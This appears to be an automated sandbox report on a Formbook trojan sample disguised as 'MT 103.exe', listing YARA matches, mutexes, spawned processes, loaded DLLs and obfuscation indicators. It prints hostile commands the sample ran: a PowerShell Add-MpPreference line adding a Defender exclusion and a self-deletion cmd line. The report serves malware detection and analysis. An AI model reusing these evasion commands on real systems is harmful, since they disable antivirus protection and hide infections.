Source: 4.2.hbwebdownload - MT 103.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 4.2.hbwebdownload - MT 103.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.hbwebdownload - MT 103.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2140305383.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2140305383.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2140305383.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.4524389651.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4524389651.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.4524389651.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.4523888584.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4523888584.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.4523888584.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2092991914.000000000484A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2092991914.000000000484A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2092991914.000000000484A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.4524319373.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4524319373.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.4524319373.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: hbwebdownload - MT 103.exe PID: 1992, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: hbwebdownload - MT 103.exe PID: 3668, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 1412, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: hbwebdownload - MT 103.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, JMVBdtlhbZ96poP7Cj.cs	Security API names: _0020.SetAccessControl
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, JMVBdtlhbZ96poP7Cj.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, JMVBdtlhbZ96poP7Cj.cs	Security API names: _0020.AddAccessRule
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, pvMKoqM6A35QhnIeqC.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, pvMKoqM6A35QhnIeqC.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, pvMKoqM6A35QhnIeqC.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, pvMKoqM6A35QhnIeqC.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, JMVBdtlhbZ96poP7Cj.cs	Security API names: _0020.SetAccessControl
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, JMVBdtlhbZ96poP7Cj.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, JMVBdtlhbZ96poP7Cj.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.evad.winEXE@11/6@11/2

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hbwebdownload - MT 103.exe.log

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Mutant created: \Sessions\1\BaseNamedObjects\aNKihXpcWs
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iixbdcve.5it.ps1

Source: hbwebdownload - MT 103.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: hbwebdownload - MT 103.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: hbwebdownload - MT 103.exe

ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Users\user\Desktop\hbwebdownload - MT 103.exe "C:\Users\user\Desktop\hbwebdownload - MT 103.exe"
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hbwebdownload - MT 103.exe"
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process created: C:\Users\user\Desktop\hbwebdownload - MT 103.exe "C:\Users\user\Desktop\hbwebdownload - MT 103.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\hbwebdownload - MT 103.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hbwebdownload - MT 103.exe"	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process created: C:\Users\user\Desktop\hbwebdownload - MT 103.exe "C:\Users\user\Desktop\hbwebdownload - MT 103.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\hbwebdownload - MT 103.exe"	Jump to behavior

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: colorui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wininet.dll	Jump to behavior

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

.NET source code contains potential unpacker

Source: hbwebdownload - MT 103.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: hbwebdownload - MT 103.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: hbwebdownload - MT 103.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: colorcpl.pdbGCTL source: hbwebdownload - MT 103.exe, 00000004.00000002.2146139487.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, hbwebdownload - MT 103.exe, 00000004.00000002.2141231992.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4524079888.00000000008E0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: colorcpl.pdb source: hbwebdownload - MT 103.exe, 00000004.00000002.2146139487.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, hbwebdownload - MT 103.exe, 00000004.00000002.2141231992.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000007.00000002.4524079888.00000000008E0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: QZ.pdb source: hbwebdownload - MT 103.exe
Source:	Binary string: wntdll.pdbUGP source: hbwebdownload - MT 103.exe, 00000004.00000002.2144698511.0000000001250000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4525061438.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4525061438.000000000493E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2145212271.00000000045FA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2141228716.000000000444A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: hbwebdownload - MT 103.exe, hbwebdownload - MT 103.exe, 00000004.00000002.2144698511.0000000001250000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000007.00000002.4525061438.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4525061438.000000000493E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2145212271.00000000045FA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2141228716.000000000444A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: QZ.pdbSHA256 source: hbwebdownload - MT 103.exe

Data Obfuscation

Source: hbwebdownload - MT 103.exe, frmListContacts.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, JMVBdtlhbZ96poP7Cj.cs	.Net Code: cTwhBhryk4 System.Reflection.Assembly.Load(byte[])
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, JMVBdtlhbZ96poP7Cj.cs	.Net Code: cTwhBhryk4 System.Reflection.Assembly.Load(byte[])
Source: 0.2.hbwebdownload - MT 103.exe.401a230.1.raw.unpack, MainForm.cs	.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.hbwebdownload - MT 103.exe.7440000.2.raw.unpack, MainForm.cs	.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 6.2.explorer.exe.108cf840.0.raw.unpack, frmListContacts.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 7.2.colorcpl.exe.4cef840.3.raw.unpack, frmListContacts.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])

Source: hbwebdownload - MT 103.exe

Static PE information: 0x91EFFE8B [Sat Aug 3 05:56:27 2047 UTC]

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 0_2_0756A9CD push FFFFFF8Bh; iretd	0_2_0756A9CF
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_00416825 push ecx; iretd	4_2_00416829
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_004168EA push ecx; ret	4_2_004168F6
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_00417116 push ss; iretd	4_2_00417118
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_00417132 push ecx; iretd	4_2_00417133
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0041E9B2 push edx; iretd	4_2_0041E9B3
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0041EA0C push 6B25699Fh; iretd	4_2_0041EA11
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_00416B3D push ds; retf	4_2_00416B4E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0040A47D pushad ; ret	4_2_0040A47E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0041D4D2 push eax; ret	4_2_0041D4D8
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0041D4DB push eax; ret	4_2_0041D542
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0041D485 push eax; ret	4_2_0041D4D8
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0041D53C push eax; ret	4_2_0041D542
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0125225F pushad ; ret	4_2_012527F9
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012527FA pushad ; ret	4_2_012527F9
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012809AD push ecx; mov dword ptr [esp], ecx	4_2_012809B6
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0125283D push eax; iretd	4_2_01252858
